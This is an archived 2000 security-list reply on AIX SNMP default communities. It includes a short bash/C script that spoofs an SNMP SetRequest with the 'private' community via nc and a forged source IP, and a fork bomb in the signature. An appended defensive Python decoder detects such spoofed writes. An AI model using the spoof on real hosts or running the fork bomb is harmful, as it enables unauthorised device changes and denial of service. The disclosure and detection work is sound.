Re: AIX SNMP Defaults

From: Michal Zalewski (lcamtufat_private)
Date: Thu Feb 17 2000 - 02:28:54 PST


    On Tue, 15 Feb 2000, harikiri wrote:
    
    > It appears that on the above releases of AIX, the SNMP daemon is
    > enabled by default and two community names are enabled with read/write
    > privileges. The community names are "private" and "system", but are
    > only allowed from localhost connections. Nevertheless, a local user
    > may install an SNMP client, and modify sensitive variables.
    
    SNMP requests with no authentication except for source-IP comparison are
    spoofable.
    
    --snip--
    #!/bin/bash
    
    cat >/tmp/spoof1.c <<'_EOF_'
    #include <unistd.h>
    /* Hand-encoded SNMPv1 SetRequest datagram, community "private" (bytes as posted). */
    char
    private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
    "\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
    /* sizeof(private) - 1: the string's terminating NUL is not part of the packet. */
    int main(void) { write(1, private, sizeof(private) - 1); return 0; }
    _EOF_
    
    gcc -o /tmp/spoof1 /tmp/spoof1.c
    
    /tmp/spoof1 | nc -s FakeSourceIPHere -u RemoteIPHere 161
    --snip--
    
    UDP blind spoofing, nothing easier.
    
    _______________________________________________________
    Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM]
    [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
    [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
    =-----=> God is real, unless declared integer. <=-----=
    
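The post's point is that a source-IP check is not authentication, so the defender's question is how a spoofed SNMP write would show up on the wire. The following decoder is an added example, not code from the post or from AIX: it parses a community-based SNMPv1/v2c datagram with a small BER reader, pulls out the community string, PDU type and variable bindings, and flags a SetRequest whose claimed 127/8 source arrived on a non-loopback interface (that ingress-interface flag, and the function names `decode_snmp` and `assess_datagram`, are this example's own assumptions). The sample input is the 49-byte packet from the post, re-encoded as Python bytes.

```python
"""Decode community-based SNMP datagrams and flag risky write requests.

Added example (not from the original post). decode_snmp, assess_datagram and
the arrived_on_loopback flag are names assumed here, not a real library's API.
"""
from dataclasses import dataclass
from typing import List, Tuple

PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}
DEFAULT_COMMUNITIES = {"public", "private", "system"}

# The packet from the post, re-encoded as Python bytes (same 49 bytes):
# SNMPv1, community "private", SetRequest sysContact.0 (1.3.6.1.2.1.1.4.0) := "null".
POSTED_PACKET = (b"\x30\x82\x00\x2d\x02\x01\x00\x04\x07private\xa3\x1f"
                 b"\x02\x01\x01\x02\x01\x00\x02\x01\x00\x30\x14\x30\x82\x00\x10"
                 b"\x06\x08\x2b\x06\x01\x02\x01\x01\x04\x00\x04\x04null")


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one BER tag-length-value at pos; return (tag, value, next position).

    Accepts short-form and definite long-form lengths; the posted packet uses
    the long form (0x82 0x00 0x2d) for a length that would fit in one byte.
    """
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        if nbytes == 0 or nbytes > 4 or pos + nbytes > len(buf):
            raise ValueError("unsupported or truncated long-form length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("TLV length exceeds datagram")
    return tag, buf[pos:pos + length], pos + length


def expect(buf: bytes, pos: int, want: int) -> Tuple[bytes, int]:
    """read_tlv that also insists on a particular tag."""
    tag, value, pos = read_tlv(buf, pos)
    if tag != want:
        raise ValueError(f"expected tag 0x{want:02x}, got 0x{tag:02x}")
    return value, pos


def decode_oid(value: bytes) -> str:
    """Turn OBJECT IDENTIFIER content octets into dotted notation."""
    if not value:
        raise ValueError("empty OID")
    arcs, acc = [value[0] // 40, value[0] % 40], 0
    for b in value[1:]:               # base-128, high bit set on all but last octet
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    if acc:
        raise ValueError("unterminated OID sub-identifier")
    return ".".join(map(str, arcs))


@dataclass
class SnmpMessage:
    version: int                      # 0 = SNMPv1, 1 = SNMPv2c (same message layout)
    community: str
    pdu_type: int
    request_id: int
    varbinds: List[Tuple[str, bytes]]

    @property
    def pdu_name(self) -> str:
        return PDU_NAMES.get(self.pdu_type, f"0x{self.pdu_type:02x}")


def decode_snmp(datagram: bytes) -> SnmpMessage:
    """Parse a community-based SNMP message (Trap PDUs have another layout; rejected)."""
    msg, _ = expect(datagram, 0, 0x30)              # Message ::= SEQUENCE
    ver, pos = expect(msg, 0, 0x02)
    version = int.from_bytes(ver, "big", signed=True)
    if version not in (0, 1):
        raise ValueError(f"unsupported SNMP version {version}")
    comm, pos = expect(msg, pos, 0x04)               # community OCTET STRING
    pdu_type, pdu, _ = read_tlv(msg, pos)
    if pdu_type not in PDU_NAMES or pdu_type == 0xA4:
        raise ValueError(f"unsupported PDU type 0x{pdu_type:02x}")
    rid, p = expect(pdu, 0, 0x02)                    # request-id
    _, p = expect(pdu, p, 0x02)                      # error-status
    _, p = expect(pdu, p, 0x02)                      # error-index
    vbl, _ = expect(pdu, p, 0x30)                    # VarBindList
    varbinds, q = [], 0
    while q < len(vbl):
        vb, q = expect(vbl, q, 0x30)                 # VarBind ::= SEQUENCE { name, value }
        oid, r = expect(vb, 0, 0x06)
        _, value, _ = read_tlv(vb, r)                # value may be any ASN.1 type
        varbinds.append((decode_oid(oid), value))
    return SnmpMessage(version, comm.decode("latin-1"), pdu_type,
                       int.from_bytes(rid, "big", signed=True), varbinds)


def assess_datagram(datagram: bytes, src_ip: str, arrived_on_loopback: bool) -> List[str]:
    """Findings for one captured datagram; arrived_on_loopback is the ingress
    interface as the sniffer or firewall log reports it (assumed available)."""
    msg = decode_snmp(datagram)
    findings = []
    if src_ip.startswith("127.") and not arrived_on_loopback:
        findings.append("loopback source on a non-loopback interface: spoofed datagram")
    if msg.pdu_type == 0xA3:
        findings.append(f"SetRequest from {src_ip} with community '{msg.community}'")
        if msg.community in DEFAULT_COMMUNITIES:
            findings.append("well-known default community string in use")
    return findings


if __name__ == "__main__":
    for line in assess_datagram(POSTED_PACKET, "127.0.0.1", arrived_on_loopback=False):
        print(line)
```

The loopback check is the same rule an ingress anti-spoofing filter applies: a datagram with a 127.0.0.0/8 source has no legitimate way to arrive on a physical interface, so the agent-side "localhost only" restriction is only as strong as that filter. The decoder also makes the other two mitigations visible in the data itself: the write community name and the PDU type are sent in the clear, which is why removing default read/write community names matters more than restricting by source address.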



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:37 PDT